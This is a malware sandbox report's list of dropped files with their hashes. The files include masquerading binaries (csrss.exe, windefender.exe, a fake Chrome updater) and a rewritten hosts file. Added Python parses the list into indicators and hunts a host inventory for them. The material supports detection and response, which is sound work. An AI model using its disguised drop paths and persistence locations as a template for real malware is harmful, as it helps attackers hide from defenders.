SHA512 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9c260eec9480ce84b15f1f374765472f
SHA1 878893212a4afba68936571299d72d3f368947c4
SHA256 8156da2387bc5c58ca7c32cca44c6d2dbe61fb2a7ea73be6f0673c270521296c
SHA512 a8334295234a90fb816633c0f01ccfaaaa70c64f52be466ff3c9086d2642f40ae7f71e229125c6a61de1c632c844b8c822dd956bc84967cee8dd1bdc672c5db2

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 1ff57801793d3fb22f74fde36f597358
SHA1 4508757a4119e742af662e8590060048d5a3a272
SHA256 f87642f786a8feac8afc599c52dd6629fea175401d1ac2130b9cc407730756be
SHA512 9e98bc7a48fba834442d20df17008d9b033a5dcf2b8e61ecbf85c3fed1eb258401074c62ec4c341b003241114f9516bba2dc5b6d7dc8c70718f747fa430d5be9

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 719b3aaabad247c7e3e168302642b20a
SHA1 503d0a10e62a42195dca3d1e31daf3b6a579dd82
SHA256 36299615fbb6ecae16b918cd91b3b6c20370811a7fa3f4dfb7468cc6148a5028
SHA512 e7d8de2bf0033a076f86018eabcf88e922693cf0be4bf90973e079a9ed0b3cfaa548279168170fae494baadb60f22d5a4d657680af0368f97e1729c9077e4bad

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b868d3f1ad475fe3e603d18c105f20a3
SHA1 5c39dd27afd0e3d7012c7345290728381a36a025
SHA256 aa5e2f5b06b2e4dea8449e92b37ff1c975c8646e6d40725c078bd7cc838134ee
SHA512 4123a31b8136278aa1289a829663badfbf011cbf788d941f8ac99dc4144272292b280cba428536b4f8247a4042c666e36fbf8114356273d4d8415c30b1c345b6

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 8046699a5948cf72713efbf617937062
SHA1 43c8a3fbf1072397acfa1b91d650267386e5e0ec
SHA256 c75f1f7aae2b393cbeeaffd02cdb4647ff2e15c79f4b141e920d5e6b2ccb0b7a
SHA512 ffd6a72189c78b1765774a59623233db66daaeff8ba17f727b1435232395790d13b34723ca0cdc6d4162c0949d159cda2e1b397057aa7bdde7a76009bfddca74

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 20bcfd66dbd06138f4dcfc776e8d2105
SHA1 062c5d034fa1ad72b55c7854ba51fb3497548856
SHA256 9d16786b5e61bd3341b686b15fb9ba35a1646d62e9c23768b3446ce58f9a5e03
SHA512 487c2f6d3d4e105b96001ed1ecd3da2fff44e3356e078d1af4d261956b1fa4368bded645729810dfed3b7047aced1a069836a440b98071b2954aef0563fe9658

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Program Files\Google\Chrome\updater.exe

MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
SHA512 a90c26d81ca69687fc7136e9ce4ca8410ef9a217d81b9f2f3d4051bd5f32604d176951a8dc14a1b0bb0157770be745819fe3ef9d64dbd50a32034bee92593074

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474
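The Files list above is the sandbox's raw artifact log: every dropped file is printed as a path followed by its MD5, SHA1, SHA256 and SHA512, every memory dump as memory/<pid>-<n>-<start>-<end>-memory.dmp, and a file or region that is captured more than once is listed more than once. Reading it by eye hides the two facts a responder most wants: the same SHA256 is written under several paths (3eef203fb515bda85f514e168abb5973.exe reappears as C:\Windows\rss\csrss.exe, updChrome.exe as C:\Program Files\Google\Chrome\updater.exe), and PID 2940's dumps are one region captured repeatedly. The Python below is an added example, not part of the sandbox report or the analysed malware: it parses this entry format into a deduplicated IOC set, reports self-copies and distinct regions per PID, and matches a host inventory against it. SAMPLE is an excerpt of the entries on this page (SHA512 lines and most blank separators dropped for brevity; the parser accepts both); HOST_INVENTORY is a constructed {path: sha256} stand-in for what a collection script would return from a live host.

```python
"""Parse this report's Files list into a deduplicated IOC set and hunt with it.
Added example, not part of the sandbox report. SAMPLE is an excerpt of the entries
above (SHA512 lines dropped); HOST_INVENTORY is a constructed {path: sha256} stand-in."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")  # a drive-letter path opens a file entry

SAMPLE = r"""
C:\Users\Admin\AppData\Local\Temp\1000187001\updChrome.exe
MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6

memory/2940-294-0x0000000004D70000-0x0000000004D85000-memory.dmp
memory/2940-296-0x0000000004D70000-0x0000000004D85000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000203001\3eef203fb515bda85f514e168abb5973.exe
MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
memory/2636-260-0x00007FF774FE0000-0x00007FF7767A9000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
MD5 ebf830587e4df50f0a886fe4bf05bda0
SHA1 3c0217098ca7b191d146b770eb366a9081187a66
SHA256 e669914a28ffc4b51c1f4e54efb0e9d6bd74a97fe293c7c8ba30b50ae4c508d6
C:\Windows\rss\csrss.exe
MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
"""

HOST_INVENTORY = {  # constructed, not from the report
    r"C:\Windows\rss\csrss.exe": "2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606",
    r"C:\Program Files\Google\Chrome\updater.exe": "0" * 64,  # same drop path, unknown build
    r"C:\Program Files\Google\Chrome\Application\chrome.exe": "f" * 64,  # benign
}

@dataclass
class FileIoc:
    path: str
    hashes: dict = field(default_factory=dict)  # algorithm -> hex digest

def parse_files_section(text):
    """A path line opens a file entry and the hash lines after it attach to it;
    memory/... lines stand alone as (pid, start, end). A hash line with no open
    entry (like the orphan SHA512 that opens this section) is skipped."""
    files, regions, current = [], [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if m := MEM_RE.match(line):
            pid, _idx, start, end = m.groups()
            regions.append((int(pid), int(start, 16), int(end, 16)))
            current = None
        elif m := HASH_RE.match(line):
            if current is not None:
                current.hashes[m.group(1)] = m.group(2)
        elif PATH_RE.match(line):
            current = FileIoc(line)
            files.append(current)
    return files, regions

def paths_by_sha256(files):
    """Collapse repeated entries to one record per SHA256 with every path it was written to."""
    out = defaultdict(set)
    for f in files:
        if "SHA256" in f.hashes:
            out[f.hashes["SHA256"]].add(f.path)
    return {h: sorted(p) for h, p in out.items()}

def self_copies(files):
    """Hashes dropped under more than one path: the sample copying itself to its persistence location."""
    return {h: p for h, p in paths_by_sha256(files).items() if len(p) > 1}

def regions_by_pid(regions):
    """Distinct (start, end) ranges per PID; the report repeats a range for each dump of it."""
    out = defaultdict(set)
    for pid, start, end in regions:
        out[pid].add((start, end))
    return {pid: sorted(v) for pid, v in out.items()}

def hunt(files, inventory):
    """Match a {path: sha256} host inventory against the IOCs: a hash hit fires on any
    path (payload copied elsewhere), a path hit when the drop location is reused by a
    binary we have not seen (repacked build)."""
    known_hashes = {h for f in files for h in f.hashes.values()}
    known_paths = {f.path.lower() for f in files}
    hits = []
    for path, sha in inventory.items():
        if sha.lower() in known_hashes:
            hits.append(("hash", path))
        elif path.lower() in known_paths:
            hits.append(("path", path))
    return sorted(hits)

if __name__ == "__main__":
    fs, rs = parse_files_section(SAMPLE)
    print(self_copies(fs), regions_by_pid(rs), hunt(fs, HOST_INVENTORY), sep="\n")
```

Run against the full Files list rather than the excerpt and the same parser also surfaces C:\Windows\windefender.exe and the rewritten C:\Windows\System32\drivers\etc\hosts, which appear here several times with one hash each. The path-only match in hunt is deliberate: a repacked build of the same family changes every hash but tends to keep its drop locations, so a hash-only hunt would miss it, while a path-only hunt on a location like C:\Program Files\Google\Chrome\updater.exe still needs the hash comparison to rule out a legitimate file.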